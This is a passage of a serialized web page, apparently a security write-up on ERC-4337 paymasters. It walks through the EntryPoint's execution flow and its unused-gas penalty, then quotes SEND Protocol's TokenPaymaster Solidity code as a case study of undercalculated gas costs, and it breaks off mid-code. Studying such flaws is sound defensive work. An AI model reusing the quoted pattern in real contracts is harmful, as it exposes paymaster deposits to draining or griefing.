begins the ",{"type":28,"tag":87,"props":102270,"children":102273},{"href":102271,"rel":102272},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L70-L72",[91],[102274],{"type":33,"value":102275},"execution",{"type":33,"value":102277}," phase, processing each ",{"type":28,"tag":98,"props":102279,"children":102281},{"className":102280},[],[102282],{"type":33,"value":101796},{"type":33,"value":102284}," individually. For each operation, the flow is:",{"type":28,"tag":455,"props":102286,"children":102287},{},[102288,102348,102394],{"type":28,"tag":459,"props":102289,"children":102290},{},[102291,102292,102297,102299,102305,102306,102312,102314],{"type":33,"value":16275},{"type":28,"tag":98,"props":102293,"children":102295},{"className":102294},[],[102296],{"type":33,"value":101877},{"type":33,"value":102298}," makes a ",{"type":28,"tag":87,"props":102300,"children":102303},{"href":102301,"rel":102302},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L213-L232",[91],[102304],{"type":33,"value":37918},{"type":33,"value":56395},{"type":28,"tag":98,"props":102307,"children":102309},{"className":102308},[],[102310],{"type":33,"value":102311},"innerHandleOp()",{"type":33,"value":102313},", which:\n",{"type":28,"tag":2108,"props":102315,"children":102316},{},[102317,102329,102334],{"type":28,"tag":459,"props":102318,"children":102319},{},[102320,102327],{"type":28,"tag":87,"props":102321,"children":102324},{"href":102322,"rel":102323},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L403",[91],[102325],{"type":33,"value":102326},"Forwards",{"type":33,"value":102328}," the operation to the sender's smart account contract",{"type":28,"tag":459,"props":102330,"children":102331},{},[102332],{"type":33,"value":102333},"Executes the intended transaction(s) within the smart account",{"type":28,"tag":459,"props":102335,"children":102336},{},[102337,102339,102346],{"type":33,"value":102338},"Handles ",{"type":28,"tag":87,"props":102340,"children":102343},{"href":102341,"rel":102342},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L821",[91],[102344],{"type":33,"value":102345},"post-execution",{"type":33,"value":102347}," tasks and cleanup",{"type":28,"tag":459,"props":102349,"children":102350},{},[102351,102353,102359,102361,102367,102368,102374,102376],{"type":33,"value":102352},"If a paymaster was used, ",{"type":28,"tag":98,"props":102354,"children":102356},{"className":102355},[],[102357],{"type":33,"value":102358},"Entrypoint",{"type":33,"value":102360}," will ",{"type":28,"tag":87,"props":102362,"children":102365},{"href":102363,"rel":102364},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L848-L857",[91],[102366],{"type":33,"value":37918},{"type":33,"value":6129},{"type":28,"tag":98,"props":102369,"children":102371},{"className":102370},[],[102372],{"type":33,"value":102373},"paymaster.postOp()",{"type":33,"value":102375}," to:\n",{"type":28,"tag":2108,"props":102377,"children":102378},{},[102379,102384,102389],{"type":28,"tag":459,"props":102380,"children":102381},{},[102382],{"type":33,"value":102383},"Allow paymaster to finalize its accounting",{"type":28,"tag":459,"props":102385,"children":102386},{},[102387],{"type":33,"value":102388},"Process any refunds or additional charges",{"type":28,"tag":459,"props":102390,"children":102391},{},[102392],{"type":33,"value":102393},"Complete any paymaster-specific logic",{"type":28,"tag":459,"props":102395,"children":102396},{},[102397,102399,102404,102405,102412,102414],{"type":33,"value":102398},"Finally, after all operations are processed, the ",{"type":28,"tag":98,"props":102400,"children":102402},{"className":102401},[],[102403],{"type":33,"value":101877},{"type":33,"value":6129},{"type":28,"tag":87,"props":102406,"children":102409},{"href":102407,"rel":102408},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L74",[91],[102410],{"type":33,"value":102411},"compensates",{"type":33,"value":102413}," the bundler for:\n",{"type":28,"tag":2108,"props":102415,"children":102416},{},[102417,102422,102427],{"type":28,"tag":459,"props":102418,"children":102419},{},[102420],{"type":33,"value":102421},"Gas costs from executing all operations",{"type":28,"tag":459,"props":102423,"children":102424},{},[102425],{"type":33,"value":102426},"Overhead from submitting the batch transaction",{"type":28,"tag":459,"props":102428,"children":102429},{},[102430],{"type":33,"value":102431},"Any unused gas, which is refunded",{"type":28,"tag":29,"props":102433,"children":102434},{},[102435],{"type":33,"value":102436},"This execution flow ensures secure and atomic operation execution, accurate tracking and settlement of gas costs, support for custom paymaster payment logic, and proper compensation for bundlers who provide the transaction submission service.",{"type":28,"tag":29,"props":102438,"children":102439},{},[102440,102442,102447,102449,102455,102457,102462],{"type":33,"value":102441},"Now that we understand how the ",{"type":28,"tag":98,"props":102443,"children":102445},{"className":102444},[],[102446],{"type":33,"value":101877},{"type":33,"value":102448}," works at a high level, let's examine how some protocols have failed to properly implement ",{"type":28,"tag":98,"props":102450,"children":102452},{"className":102451},[],[102453],{"type":33,"value":102454},"paymasters",{"type":33,"value":102456}," that align with the ",{"type":28,"tag":98,"props":102458,"children":102460},{"className":102459},[],[102461],{"type":33,"value":101877},{"type":33,"value":102463},"'s execution model, leading to potential vulnerabilities.",{"type":28,"tag":41,"props":102465,"children":102467},{"id":102466},"common-pitfalls-in-paymaster-implementation",[102468],{"type":33,"value":102469},"Common Pitfalls in Paymaster Implementation",{"type":28,"tag":29,"props":102471,"children":102472},{},[102473,102475,102480],{"type":33,"value":102474},"While paymasters offer powerful flexibility, they also introduce new complexity, and with it, room for subtle bugs. Missteps in paymaster design can not only break gas sponsorship flows, but also expose their deposited ETH in the ",{"type":28,"tag":98,"props":102476,"children":102478},{"className":102477},[],[102479],{"type":33,"value":101877},{"type":33,"value":102481}," to exploitation or griefing.",{"type":28,"tag":29,"props":102483,"children":102484},{},[102485,102487,102492],{"type":33,"value":102486},"In this section, we’ll walk through the ",{"type":28,"tag":4995,"props":102488,"children":102489},{},[102490],{"type":33,"value":102491},"two most common pitfalls",{"type":33,"value":102493}," we’ve observed in real-world paymaster implementations:",{"type":28,"tag":63,"props":102495,"children":102497},{"id":102496},"undercalculated-gas-costs",[102498],{"type":28,"tag":4995,"props":102499,"children":102500},{},[102501],{"type":33,"value":102502},"Undercalculated Gas Costs",{"type":28,"tag":29,"props":102504,"children":102505},{},[102506,102508,102513,102515,102520,102522,102527,102529,102536],{"type":33,"value":102507},"To understand this issue, let's first examine how gas penalties work in the ",{"type":28,"tag":98,"props":102509,"children":102511},{"className":102510},[],[102512],{"type":33,"value":101877},{"type":33,"value":102514},". When a ",{"type":28,"tag":98,"props":102516,"children":102518},{"className":102517},[],[102519],{"type":33,"value":101796},{"type":33,"value":102521}," specifies an execution gas limit higher than what's actually used during execution, the ",{"type":28,"tag":98,"props":102523,"children":102525},{"className":102524},[],[102526],{"type":33,"value":101877},{"type":33,"value":102528}," charges a ",{"type":28,"tag":87,"props":102530,"children":102533},{"href":102531,"rel":102532},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.7/contracts/core/EntryPoint.sol#L718-L728",[91],[102534],{"type":33,"value":102535},"penalty of 10%",{"type":33,"value":102537}," of the unused gas. This penalty is paid to the bundler and is deducted from either the user's deposit (for regular transactions) or the paymaster's deposit (when using a paymaster).",{"type":28,"tag":29,"props":102539,"children":102540},{},[102541],{"type":33,"value":102542},"Now, let's examine a real-world example of how this penalty mechanism could impact paymasters. The SEND Protocol's paymaster implementation provides an instructive case study:",{"type":28,"tag":234,"props":102544,"children":102546},{"className":4143,"code":102545,"language":4142,"meta":7,"style":7},"contract TokenPaymaster is BasePaymaster, UniswapHelper, OracleHelper {\n[...]\n    function _validatePaymasterUserOp(PackedUserOperation calldata userOp, bytes32, uint256 requiredPreFund)\n        internal\n        override\n        returns (bytes memory context, uint256 validationResult)\n    {\n        unchecked {\n            uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n            uint256 baseFee = tokenPaymasterConfig.baseFee;\n            uint256 dataLength = userOp.paymasterAndData.length - PAYMASTER_DATA_OFFSET;\n            require(dataLength == 0 || dataLength == 32, \"TPM: invalid data length\");\n            uint256 maxFeePerGas = userOp.unpackMaxFeePerGas();\n            uint256 refundPostopCost = tokenPaymasterConfig.refundPostopCost;\n            require(refundPostopCost \u003C userOp.unpackPostOpGasLimit(), \"TPM: postOpGasLimit too low\");\n            uint256 preChargeNative = requiredPreFund + (refundPostopCost * maxFeePerGas);\n            // note: price is in native-asset-per-token increasing it means dividing it by markup\n            uint256 cachedPriceWithMarkup = cachedPrice * DENOM / priceMarkup;\n            if (dataLength == 32) {\n                uint256 clientSuppliedPrice =\n                    uint256(bytes32(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET:PAYMASTER_DATA_OFFSET + 32]));\n                if (clientSuppliedPrice \u003C cachedPriceWithMarkup) {\n                    // note: smaller number means 'more native asset per token'\n                    cachedPriceWithMarkup = clientSuppliedPrice;\n                }\n            }\n            uint256 tokenAmount = weiToToken(preChargeNative, cachedPriceWithMarkup);\n            tokenAmount += baseFee;\n            SafeERC20.safeTransferFrom(token, userOp.sender, address(this), tokenAmount);\n            context = abi.encode(tokenAmount, userOp.sender);\n            validationResult =\n                _packValidationData(false, uint48(cachedPriceTimestamp + tokenPaymasterConfig.priceMaxAge), 0);\n        }\n    }\n[...]\n    function _postOp(PostOpMode, bytes calldata context, uint256 actualGasCost, uint256 actualUserOpFeePerGas)\n        internal\n        override\n    {\n        unchecked {\n            uint256 priceMarkup = tokenPaymasterConfig.priceMarkup;\n            uint256 baseFee = tokenPaymasterConfig.baseFee;\n            (uint256 preCharge, address userOpSender) = abi.decode(context, (uint256, address));\n            preCharge -= baseFee; // don't refund the base fee\n            uint256 _cachedPrice = updateCachedPrice(false);\n            // note: price is in native-asset-per-token increasing it means dividing it by markup\n            uint256 cachedPriceWithMarkup = _cachedPrice * DENOM / priceMarkup;\n            // Refund tokens based on actual gas cost\n            uint256 actualChargeNative = actualGasCost + tokenPaymasterConfig.refundPostopCost * actualUserOpFeePerGas;\n            uint256 actualTokenNeeded = weiToToken(actualChargeNative, cachedPriceWithMarkup);\n            if (preCharge > actualTokenNeeded) {\n                // If initially provided token amount is greater than the actual amount needed, refund the difference\n                SafeERC20.safeTransfer(token, userOpSender, preCharge - actualTokenNeeded);\n            } else if (preCharge \u003C actualTokenNeeded) {\n                // Attempt to cover Paymaster's gas expenses by withdrawing the 'overdraft' from the client\n                // If the transfer reverts also revert the 'postOp' to remove the incentive to cheat\n                SafeERC20.safeTransferFrom(token, userOpSender, address(this), actualTokenNeeded - preCharge);\n            }\n\n            if (baseFee > 0) {\n                SafeERC20.safeTransfer(token, tokenPaymasterConfig.rewardsPool, baseFee);\n            }\n\n            emit UserOperationSponsored(userOpSender, actualTokenNeeded, actualGasCost, cachedPriceWithMarkup, baseFee);\n            refillEntryPointDeposit(_cachedPrice);\n        }\n    }\n}\n",[102547],{"type":28,"tag":98,"props":102548,"children":102549},{"__ignoreMap":7},[102550,102594,102601,102658,102666,102674,102716,102723,102735,102757,102778,102808,102859,102889,102910,102948,102987,103004,103043,103067,103084,103126,103148,103165,103182,103189,103196,103222,103239,103274,103305,103317,103364,103371,103378,103385,103452,103459,103466,103473,103484,103503,103522,103586,103609,103642,103657,103692,103700,103739,103764,103785,103793,103820,103847,103855,103863,103905,103912,103919,103943,103959,103966,103973,103991,104004,104011,104019],{"type":28,"tag":116,"props":102551,"children":102552},{"class":245,"line":246},[102553,102557,102562,102567,102572,102576,102581,102585,102590],{"type":28,"tag":116,"props":102554,"children":102555},{"style":376},[102556],{"type":33,"value":89432},{"type":28,"tag":116,"props":102558,"children":102559},{"style":339},[102560],{"type":33,"value":102561}," TokenPaymaster",{"type":28,"tag":116,"props":102563,"children":102564},{"style":376},[102565],{"type":33,"value":102566}," is",{"type":28,"tag":116,"props":102568,"children":102569},{"style":339},[102570],{"type":33,"value":102571}," BasePaymaster",{"type":28,"tag":116,"props":102573,"children":102574},{"style":266},[102575],{"type":33,"value":825},{"type":28,"tag":116,"props":102577,"children":102578},{"style":339},[102579],{"type":33,"value":102580},"UniswapHelper",{"type":28,"tag":116,"props":102582,"children":102583},{"style":266},[102584],{"type":33,"value":825},{"type":28,"tag":116,"props":102586,"children":102587},{"style":339},[102588],{"type":33,"value":102589},"OracleHelper",{"type":28,"tag":116,"props":102591,"children":102592},{"style":266},[102593],{"type":33,"value":1291},{"type":28,"tag":116,"props":102595,"children":102596},{"class":245,"line":256},[102597],{"type":28,"tag":116,"props":102598,"children":102599},{"style":266},[102600],{"type":33,"value":9986},{"type":28,"tag":116,"props":102602,"children":102603},{"class":245,"line":293},[102604,102608,102613,102617,102622,102627,102632,102636,102641,102645,102649,102654],{"type":28,"tag":116,"props":102605,"children":102606},{"style":376},[102607],{"type":33,"value":89449},{"type":28,"tag":116,"props":102609,"children":102610},{"style":282},[102611],{"type":33,"value":102612}," _validatePaymasterUserOp",{"type":28,"tag":116,"props":102614,"children":102615},{"style":266},[102616],{"type":33,"value":313},{"type":28,"tag":116,"props":102618,"children":102619},{"style":376},[102620],{"type":33,"value":102621},"PackedUserOperation",{"type":28,"tag":116,"props":102623,"children":102624},{"style":376},[102625],{"type":33,"value":102626}," calldata",{"type":28,"tag":116,"props":102628,"children":102629},{"style":272},[102630],{"type":33,"value":102631}," userOp",{"type":28,"tag":116,"props":102633,"children":102634},{"style":266},[102635],{"type":33,"value":825},{"type":28,"tag":116,"props":102637,"children":102638},{"style":339},[102639],{"type":33,"value":102640},"bytes32",{"type":28,"tag":116,"props":102642,"children":102643},{"style":266},[102644],{"type":33,"value":825},{"type":28,"tag":116,"props":102646,"children":102647},{"style":339},[102648],{"type":33,"value":45793},{"type":28,"tag":116,"props":102650,"children":102651},{"style":272},[102652],{"type":33,"value":102653}," requiredPreFund",{"type":28,"tag":116,"props":102655,"children":102656},{"style":266},[102657],{"type":33,"value":2830},{"type":28,"tag":116,"props":102659,"children":102660},{"class":245,"line":361},[102661],{"type":28,"tag":116,"props":102662,"children":102663},{"style":376},[102664],{"type":33,"value":102665},"        internal\n",{"type":28,"tag":116,"props":102667,"children":102668},{"class":245,"line":387},[102669],{"type":28,"tag":116,"props":102670,"children":102671},{"style":376},[102672],{"type":33,"value":102673},"        override\n",{"type":28,"tag":116,"props":102675,"children":102676},{"class":245,"line":400},[102677,102682,102686,102690,102695,102699,102703,102707,102712],{"type":28,"tag":116,"props":102678,"children":102679},{"style":260},[102680],{"type":33,"value":102681},"        returns",{"type":28,"tag":116,"props":102683,"children":102684},{"style":266},[102685],{"type":33,"value":269},{"type":28,"tag":116,"props":102687,"children":102688},{"style":339},[102689],{"type":33,"value":83446},{"type":28,"tag":116,"props":102691,"children":102692},{"style":376},[102693],{"type":33,"value":102694}," memory",{"type":28,"tag":116,"props":102696,"children":102697},{"style":272},[102698],{"type":33,"value":75960},{"type":28,"tag":116,"props":102700,"children":102701},{"style":266},[102702],{"type":33,"value":825},{"type":28,"tag":116,"props":102704,"children":102705},{"style":339},[102706],{"type":33,"value":45793},{"type":28,"tag":116,"props":102708,"children":102709},{"style":272},[102710],{"type":33,"value":102711}," validationResult",{"type":28,"tag":116,"props":102713,"children":102714},{"style":266},[102715],{"type":33,"value":2830},{"type":28,"tag":116,"props":102717,"children":102718},{"class":245,"line":614},[102719],{"type":28,"tag":116,"props":102720,"children":102721},{"style":266},[102722],{"type":33,"value":28842},{"type":28,"tag":116,"props":102724,"children":102725},{"class":245,"line":631},[102726,102731],{"type":28,"tag":116,"props":102727,"children":102728},{"style":260},[102729],{"type":33,"value":102730},"        unchecked",{"type":28,"tag":116,"props":102732,"children":102733},{"style":266},[102734],{"type":33,"value":1291},{"type":28,"tag":116,"props":102736,"children":102737},{"class":245,"line":665},[102738,102743,102748,102752],{"type":28,"tag":116,"props":102739,"children":102740},{"style":339},[102741],{"type":33,"value":102742},"            uint256",{"type":28,"tag":116,"props":102744,"children":102745},{"style":266},[102746],{"type":33,"value":102747}," priceMarkup ",{"type":28,"tag":116,"props":102749,"children":102750},{"style":370},[102751],{"type":33,"value":373},{"type":28,"tag":116,"props":102753,"children":102754},{"style":266},[102755],{"type":33,"value":102756}," tokenPaymasterConfig.priceMarkup;\n",{"type":28,"tag":116,"props":102758,"children":102759},{"class":245,"line":713},[102760,102764,102769,102773],{"type":28,"tag":116,"props":102761,"children":102762},{"style":339},[102763],{"type":33,"value":102742},{"type":28,"tag":116,"props":102765,"children":102766},{"style":266},[102767],{"type":33,"value":102768}," baseFee ",{"type":28,"tag":116,"props":102770,"children":102771},{"style":370},[102772],{"type":33,"value":373},{"type":28,"tag":116,"props":102774,"children":102775},{"style":266},[102776],{"type":33,"value":102777}," tokenPaymasterConfig.baseFee;\n",{"type":28,"tag":116,"props":102779,"children":102780},{"class":245,"line":750},[102781,102785,102790,102794,102799,102803],{"type":28,"tag":116,"props":102782,"children":102783},{"style":339},[102784],{"type":33,"value":102742},{"type":28,"tag":116,"props":102786,"children":102787},{"style":266},[102788],{"type":33,"value":102789}," dataLength ",{"type":28,"tag":116,"props":102791,"children":102792},{"style":370},[102793],{"type":33,"value":373},{"type":28,"tag":116,"props":102795,"children":102796},{"style":266},[102797],{"type":33,"value":102798}," userOp.paymasterAndData.length ",{"type":28,"tag":116,"props":102800,"children":102801},{"style":370},[102802],{"type":33,"value":3996},{"type":28,"tag":116,"props":102804,"children":102805},{"style":266},[102806],{"type":33,"value":102807}," PAYMASTER_DATA_OFFSET;\n",{"type":28,"tag":116,"props":102809,"children":102810},{"class":245,"line":779},[102811,102816,102821,102825,102829,102833,102837,102841,102846,102850,102855],{"type":28,"tag":116,"props":102812,"children":102813},{"style":260},[102814],{"type":33,"value":102815},"            require",{"type":28,"tag":116,"props":102817,"children":102818},{"style":266},[102819],{"type":33,"value":102820},"(dataLength ",{"type":28,"tag":116,"props":102822,"children":102823},{"style":370},[102824],{"type":33,"value":2340},{"type":28,"tag":116,"props":102826,"children":102827},{"style":350},[102828],{"type":33,"value":2718},{"type":28,"tag":116,"props":102830,"children":102831},{"style":370},[102832],{"type":33,"value":23361},{"type":28,"tag":116,"props":102834,"children":102835},{"style":266},[102836],{"type":33,"value":102789},{"type":28,"tag":116,"props":102838,"children":102839},{"style":370},[102840],{"type":33,"value":2340},{"type":28,"tag":116,"props":102842,"children":102843},{"style":350},[102844],{"type":33,"value":102845}," 32",{"type":28,"tag":116,"props":102847,"children":102848},{"style":266},[102849],{"type":33,"value":825},{"type":28,"tag":116,"props":102851,"children":102852},{"style":563},[102853],{"type":33,"value":102854},"\"TPM: invalid data length\"",{"type":28,"tag":116,"props":102856,"children":102857},{"style":266},[102858],{"type":33,"value":895},{"type":28,"tag":116,"props":102860,"children":102861},{"class":245,"line":796},[102862,102866,102871,102875,102880,102885],{"type":28,"tag":116,"props":102863,"children":102864},{"style":339},[102865],{"type":33,"value":102742},{"type":28,"tag":116,"props":102867,"children":102868},{"style":266},[102869],{"type":33,"value":102870}," maxFeePerGas ",{"type":28,"tag":116,"props":102872,"children":102873},{"style":370},[102874],{"type":33,"value":373},{"type":28,"tag":116,"props":102876,"children":102877},{"style":266},[102878],{"type":33,"value":102879}," userOp.",{"type":28,"tag":116,"props":102881,"children":102882},{"style":282},[102883],{"type":33,"value":102884},"unpackMaxFeePerGas",{"type":28,"tag":116,"props":102886,"children":102887},{"style":266},[102888],{"type":33,"value":1445},{"type":28,"tag":116,"props":102890,"children":102891},{"class":245,"line":847},[102892,102896,102901,102905],{"type":28,"tag":116,"props":102893,"children":102894},{"style":339},[102895],{"type":33,"value":102742},{"type":28,"tag":116,"props":102897,"children":102898},{"style":266},[102899],{"type":33,"value":102900}," refundPostopCost ",{"type":28,"tag":116,"props":102902,"children":102903},{"style":370},[102904],{"type":33,"value":373},{"type":28,"tag":116,"props":102906,"children":102907},{"style":266},[102908],{"type":33,"value":102909}," tokenPaymasterConfig.refundPostopCost;\n",{"type":28,"tag":116,"props":102911,"children":102912},{"class":245,"line":898},[102913,102917,102922,102926,102930,102935,102939,102944],{"type":28,"tag":116,"props":102914,"children":102915},{"style":260},[102916],{"type":33,"value":102815},{"type":28,"tag":116,"props":102918,"children":102919},{"style":266},[102920],{"type":33,"value":102921},"(refundPostopCost ",{"type":28,"tag":116,"props":102923,"children":102924},{"style":370},[102925],{"type":33,"value":514},{"type":28,"tag":116,"props":102927,"children":102928},{"style":266},[102929],{"type":33,"value":102879},{"type":28,"tag":116,"props":102931,"children":102932},{"style":282},[102933],{"type":33,"value":102934},"unpackPostOpGasLimit",{"type":28,"tag":116,"props":102936,"children":102937},{"style":266},[102938],{"type":33,"value":18038},{"type":28,"tag":116,"props":102940,"children":102941},{"style":563},[102942],{"type":33,"value":102943},"\"TPM: postOpGasLimit too low\"",{"type":28,"tag":116,"props":102945,"children":102946},{"style":266},[102947],{"type":33,"value":895},{"type":28,"tag":116,"props":102949,"children":102950},{"class":245,"line":907},[102951,102955,102960,102964,102969,102973,102978,102982],{"type":28,"tag":116,"props":102952,"children":102953},{"style":339},[102954],{"type":33,"value":102742},{"type":28,"tag":116,"props":102956,"children":102957},{"style":266},[102958],{"type":33,"value":102959}," preChargeNative ",{"type":28,"tag":116,"props":102961,"children":102962},{"style":370},[102963],{"type":33,"value":373},{"type":28,"tag":116,"props":102965,"children":102966},{"style":266},[102967],{"type":33,"value":102968}," requiredPreFund ",{"type":28,"tag":116,"props":102970,"children":102971},{"style":370},[102972],{"type":33,"value":2268},{"type":28,"tag":116,"props":102974,"children":102975},{"style":266},[102976],{"type":33,"value":102977}," (refundPostopCost ",{"type":28,"tag":116,"props":102979,"children":102980},{"style":370},[102981],{"type":33,"value":4240},{"type":28,"tag":116,"props":102983,"children":102984},{"style":266},[102985],{"type":33,"value":102986}," maxFeePerGas);\n",{"type":28,"tag":116,"props":102988,"children":102989},{"class":245,"line":981},[102990,102995,102999],{"type":28,"tag":116,"props":102991,"children":102992},{"style":250},[102993],{"type":33,"value":102994},"            // ",{"type":28,"tag":116,"props":102996,"children":102997},{"style":376},[102998],{"type":33,"value":66379},{"type":28,"tag":116,"props":103000,"children":103001},{"style":250},[103002],{"type":33,"value":103003},": price is in native-asset-per-token increasing it means dividing it by markup\n",{"type":28,"tag":116,"props":103005,"children":103006},{"class":245,"line":1011},[103007,103011,103016,103020,103025,103029,103034,103038],{"type":28,"tag":116,"props":103008,"children":103009},{"style":339},[103010],{"type":33,"value":102742},{"type":28,"tag":116,"props":103012,"children":103013},{"style":266},[103014],{"type":33,"value":103015}," cachedPriceWithMarkup ",{"type":28,"tag":116,"props":103017,"children":103018},{"style":370},[103019],{"type":33,"value":373},{"type":28,"tag":116,"props":103021,"children":103022},{"style":266},[103023],{"type":33,"value":103024}," cachedPrice ",{"type":28,"tag":116,"props":103026,"children":103027},{"style":370},[103028],{"type":33,"value":4240},{"type":28,"tag":116,"props":103030,"children":103031},{"style":266},[103032],{"type":33,"value":103033}," DENOM ",{"type":28,"tag":116,"props":103035,"children":103036},{"style":370},[103037],{"type":33,"value":4250},{"type":28,"tag":116,"props":103039,"children":103040},{"style":266},[103041],{"type":33,"value":103042}," priceMarkup;\n",{"type":28,"tag":116,"props":103044,"children":103045},{"class":245,"line":1029},[103046,103050,103055,103059,103063],{"type":28,"tag":116,"props":103047,"children":103048},{"style":260},[103049],{"type":33,"value":58419},{"type":28,"tag":116,"props":103051,"children":103052},{"style":266},[103053],{"type":33,"value":103054}," (dataLength ",{"type":28,"tag":116,"props":103056,"children":103057},{"style":370},[103058],{"type":33,"value":2340},{"type":28,"tag":116,"props":103060,"children":103061},{"style":350},[103062],{"type":33,"value":102845},{"type":28,"tag":116,"props":103064,"children":103065},{"style":266},[103066],{"type":33,"value":844},{"type":28,"tag":116,"props":103068,"children":103069},{"class":245,"line":1038},[103070,103075,103080],{"type":28,"tag":116,"props":103071,"children":103072},{"style":339},[103073],{"type":33,"value":103074},"                uint256",{"type":28,"tag":116,"props":103076,"children":103077},{"style":266},[103078],{"type":33,"value":103079}," clientSuppliedPrice ",{"type":28,"tag":116,"props":103081,"children":103082},{"style":370},[103083],{"type":33,"value":14359},{"type":28,"tag":116,"props":103085,"children":103086},{"class":245,"line":1047},[103087,103092,103096,103100,103105,103109,103114,103118,103122],{"type":28,"tag":116,"props":103088,"children":103089},{"style":339},[103090],{"type":33,"value":103091},"                    uint256",{"type":28,"tag":116,"props":103093,"children":103094},{"style":266},[103095],{"type":33,"value":313},{"type":28,"tag":116,"props":103097,"children":103098},{"style":339},[103099],{"type":33,"value":102640},{"type":28,"tag":116,"props":103101,"children":103102},{"style":266},[103103],{"type":33,"value":103104},"(userOp.paymasterAndData[PAYMASTER_DATA_OFFSET",{"type":28,"tag":116,"props":103106,"children":103107},{"style":370},[103108],{"type":33,"value":4160},{"type":28,"tag":116,"props":103110,"children":103111},{"style":266},[103112],{"type":33,"value":103113},"PAYMASTER_DATA_OFFSET ",{"type":28,"tag":116,"props":103115,"children":103116},{"style":370},[103117],{"type":33,"value":2268},{"type":28,"tag":116,"props":103119,"children":103120},{"style":350},[103121],{"type":33,"value":102845},{"type":28,"tag":116,"props":103123,"children":103124},{"style":266},[103125],{"type":33,"value":358},{"type":28,"tag":116,"props":103127,"children":103128},{"class":245,"line":1071},[103129,103134,103139,103143],{"type":28,"tag":116,"props":103130,"children":103131},{"style":260},[103132],{"type":33,"value":103133},"                if",{"type":28,"tag":116,"props":103135,"children":103136},{"style":266},[103137],{"type":33,"value":103138}," (clientSuppliedPrice ",{"type":28,"tag":116,"props":103140,"children":103141},{"style":370},[103142],{"type":33,"value":514},{"type":28,"tag":116,"props":103144,"children":103145},{"style":266},[103146],{"type":33,"value":103147}," cachedPriceWithMarkup) {\n",{"type":28,"tag":116,"props":103149,"children":103150},{"class":245,"line":1137},[103151,103156,103160],{"type":28,"tag":116,"props":103152,"children":103153},{"style":250},[103154],{"type":33,"value":103155},"                    // ",{"type":28,"tag":116,"props":103157,"children":103158},{"style":376},[103159],{"type":33,"value":66379},{"type":28,"tag":116,"props":103161,"children":103162},{"style":250},[103163],{"type":33,"value":103164},": smaller number means 'more native asset per token'\n",{"type":28,"tag":116,"props":103166,"children":103167},{"class":245,"line":1181},[103168,103173,103177],{"type":28,"tag":116,"props":103169,"children":103170},{"style":266},[103171],{"type":33,"value":103172},"                    cachedPriceWithMarkup ",{"type":28,"tag":116,"props":103174,"children":103175},{"style":370},[103176],{"type":33,"value":373},{"type":28,"tag":116,"props":103178,"children":103179},{"style":266},[103180],{"type":33,"value":103181}," clientSuppliedPrice;\n",{"type":28,"tag":116,"props":103183,"children":103184},{"class":245,"line":1212},[103185],{"type":28,"tag":116,"props":103186,"children":103187},{"style":266},[103188],{"type":33,"value":70689},{"type":28,"tag":116,"props":103190,"children":103191},{"class":245,"line":1254},[103192],{"type":28,"tag":116,"props":103193,"children":103194},{"style":266},[103195],{"type":33,"value":58503},{"type":28,"tag":116,"props":103197,"children":103198},{"class":245,"line":1262},[103199,103203,103208,103212,103217],{"type":28,"tag":116,"props":103200,"children":103201},{"style":339},[103202],{"type":33,"value":102742},{"type":28,"tag":116,"props":103204,"children":103205},{"style":266},[103206],{"type":33,"value":103207}," tokenAmount ",{"type":28,"tag":116,"props":103209,"children":103210},{"style":370},[103211],{"type":33,"value":373},{"type":28,"tag":116,"props":103213,"children":103214},{"style":282},[103215],{"type":33,"value":103216}," weiToToken",{"type":28,"tag":116,"props":103218,"children":103219},{"style":266},[103220],{"type":33,"value":103221},"(preChargeNative, cachedPriceWithMarkup);\n",{"type":28,"tag":116,"props":103223,"children":103224},{"class":245,"line":1294},[103225,103230,103234],{"type":28,"tag":116,"props":103226,"children":103227},{"style":266},[103228],{"type":33,"value":103229},"            tokenAmount ",{"type":28,"tag":116,"props":103231,"children":103232},{"style":370},[103233],{"type":33,"value":68058},{"type":28,"tag":116,"props":103235,"children":103236},{"style":266},[103237],{"type":33,"value":103238}," baseFee;\n",{"type":28,"tag":116,"props":103240,"children":103241},{"class":245,"line":1334},[103242,103247,103252,103257,103261,103265,103269],{"type":28,"tag":116,"props":103243,"children":103244},{"style":266},[103245],{"type":33,"value":103246},"            SafeERC20.",{"type":28,"tag":116,"props":103248,"children":103249},{"style":282},[103250],{"type":33,"value":103251},"safeTransferFrom",{"type":28,"tag":116,"props":103253,"children":103254},{"style":266},[103255],{"type":33,"value":103256},"(token, userOp.sender, ",{"type":28,"tag":116,"props":103258,"children":103259},{"style":339},[103260],{"type":33,"value":32281},{"type":28,"tag":116,"props":103262,"children":103263},{"style":266},[103264],{"type":33,"value":313},{"type":28,"tag":116,"props":103266,"children":103267},{"style":376},[103268],{"type":33,"value":17355},{"type":28,"tag":116,"props":103270,"children":103271},{"style":266},[103272],{"type":33,"value":103273},"), tokenAmount);\n",{"type":28,"tag":116,"props":103275,"children":103276},{"class":245,"line":1372},[103277,103282,103286,103291,103295,103300],{"type":28,"tag":116,"props":103278,"children":103279},{"style":266},[103280],{"type":33,"value":103281},"            context ",{"type":28,"tag":116,"props":103283,"children":103284},{"style":370},[103285],{"type":33,"value":373},{"type":28,"tag":116,"props":103287,"children":103288},{"style":376},[103289],{"type":33,"value":103290}," abi",{"type":28,"tag":116,"props":103292,"children":103293},{"style":266},[103294],{"type":33,"value":141},{"type":28,"tag":116,"props":103296,"children":103297},{"style":282},[103298],{"type":33,"value":103299},"encode",{"type":28,"tag":116,"props":103301,"children":103302},{"style":266},[103303],{"type":33,"value":103304},"(tokenAmount, userOp.sender);\n",{"type":28,"tag":116,"props":103306,"children":103307},{"class":245,"line":1381},[103308,103313],{"type":28,"tag":116,"props":103309,"children":103310},{"style":266},[103311],{"type":33,"value":103312},"            validationResult 